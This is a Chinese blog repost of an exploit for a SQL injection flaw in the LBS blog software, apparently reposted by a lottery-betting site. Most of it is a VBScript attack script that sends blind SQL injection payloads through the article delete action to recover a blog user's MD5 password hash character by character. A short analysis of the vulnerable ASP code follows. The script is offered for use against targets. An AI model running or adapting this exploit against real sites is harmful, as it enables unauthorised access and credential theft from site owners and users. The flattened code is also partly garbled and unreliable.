LBS blog sql注射漏洞[All version]-官方已有补丁_java

作者:官方彩票手机投注网站-服务器运维

呵呵,只是证明下漏洞存在 exp如下,保存为vbs,自己下个程序测试自己吧 'From剑心 '============================================================================ '使用说明: '在命令提示符下: 'cscript.exelbsblog.vbs要攻击的网站的博客路径有效的文章id要破解的博客用户密码 '如: 'cscript.exelbsblog.vbswww.xxxx.com/blog/11 'byloveshell '============================================================================ OnErrorResumeNext DimoArgs DimolbsXML'XMLHTTP对象用来打开目标网址 DimTargetURL'目标网址 Dimuserid,articleid'博客用户名 DimTempStr'存放已获取的部分MD5密码 DimCharHex'定义16进制字符 Dimcharset SetoArgs=WScript.arguments IfoArgs.count<1ThenCallShowUsage() SetolbsXML=createObject '补充完整目标网址 TargetURL=oArgs IfLCase<>" Ifright<>"/"ThenTargetURL=TargetURL&"/" TargetURL=TargetURL&"article.asp" articleid=oArgs TempStr="" CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",") WScript.echo"LBSblogAllversionExploit"&vbcrlf WScript.echo"By剑心"&vbcrlf WScript.echo" WScript.echo"+Fuckthesitenow"&vbcrlf Callmain SetoBokeXML=Nothing '----------------------------------------------sub------------------------------------------------------- '============================================ '函数名称:main '函数功能:主程序,注入获得blog用户密码 '============================================ Submain DimMainOffset,SubOffset,TempLen,OpenURL,GetPage ForMainOffset=1To40 ForSubOffset=0To15 TempLen=0 postdata="" postdata=articleid&"and(selectleft(user_password,"&MainOffset&")fromblog_userwhereuser_)='"&TempStr&CharHex&"'" OpenURL=TargetURL olbsXML.open"Post",OpenURL,False,"","" olbsXML.setRequestHeader"Content-Type","application/x-www-form-urlencoded" olbsXML.send"act=delete&deleted")<>0Then '"博客用户不存在或填写的资料有误"为错误标志,返回此标志说明猜解的MD5不正确 '如果得到0000000000000000的MD5值,请修改错误标志 ElseIfInStr<>0Then TempStr=TempStr&CharHex WScript.Echo"+Cracknow:"&TempStr Exitfor Else WScript.echovbcrlf&"Somethingerror"&vbcrlf WScript.echovbcrlf&GetPage&vbcrlf WScript.Quit EndIf next Next WScript.Echovbcrlf&"+WeGotIt:"&TempStr&vbcrlf&vbcrlf&":PDon'tBeevil" Endsub '============================================ '函数名称:BytesToBstr '函数功能:将XMLHTTP对象中的内容转化为GB2312编码 '============================================ FunctionBytesToBstr dimobjstream setobjstream=createObject objstream.Type=1 objstream.Mode=3 objstream.Open objstream.Writebody objstream.Position=0 objstream.Type=2 objstream.Charset="GB2312" BytesToBstr=objstream.ReadText objstream.Close setobjstream=nothing EndFunction '============================ '函数名称:ShowUsage '函数功能:使用方法提示 '============================ SubShowUsage() WScript.echo"LBSblogExploit"&vbcrlf&"ByLoveshell/剑心" WScript.echo"Usage:"&vbcrlf&"CScript"&WScript.ScriptFullName&"TargetURLBlogName" WScript.echo"Example:"&vbcrlf&"CScript"&WScript.ScriptFullName&"" WScript.echo"" WScript.Quit EndSub 漏洞说明: src_article.asp中的 ...... input["log_id"]=func.checkInt; if{ strError=lang["invalid_parameter"]; }else{ //Checkifthearticleexists theArticle.load("log_id,log_authorID,log_catID","log_id"]); strError=false; } ...... 过滤的是log_id,但是使用的确实id,呵呵:) 然后呢? class/article.asp中的代码 this.load=function{ vartmpA=connBlog.query("selectTOP1"+strselect+"FROM[blog_Article]where"+strwhere); if{ this.fill; returntrue; }else{ returnfalse; } } 上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦! functionarticledelete(){ if(theUser.rights["delete"]<1){ //CheckUserRight-withoutDBQuery pageHeader; redirectMessage(lang["error"],lang["no_rights"],lang["goback"],"javascript:window.history.back; }else{ vartheArticle=newlbsArticle(); varstrError; 默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵

本文由彩票投注软件发布,转载请注明来源

关键词: